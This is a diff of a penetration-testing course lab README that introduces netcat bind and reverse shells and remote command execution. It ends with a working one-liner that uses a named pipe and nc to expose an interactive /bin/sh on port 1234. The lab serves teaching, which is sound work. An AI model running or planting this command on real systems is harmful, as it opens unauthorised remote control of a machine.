mkijowski/pen-testing-labs/lab0/README.md

 ### Task 5 - Reverse and bind Shells
-Now that you have some experience creating sockets, lets take a look at likely the most popular usage of `nc`, bind and reverse shells.
-[Read more about reverse and bind shells here](https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/) then continue.

-Investigate the following linux command(s):
+Now that you have some experience creating sockets, lets take a look at likely the most popular usage of `nc`, [bind and reverse shells.](https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/) then continue.
+Bind and reverse shells are the bread and butter of attackers and pentesters.
+Many of the vulnerabilities we will be taking a look at in this class have the same end result: Remote Command Execution, meaning they allow an attacker or pentester to run an arbitrary commancd remotely without the need to be signed in or even have an account on the system.
+But how much damage could an atacker do with `cd` or `ls` (rhetorical, no need to answer this one).
+Instead, investigate the following linux command(s):

 ```
 rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc -l 1234 >/tmp/f
 ```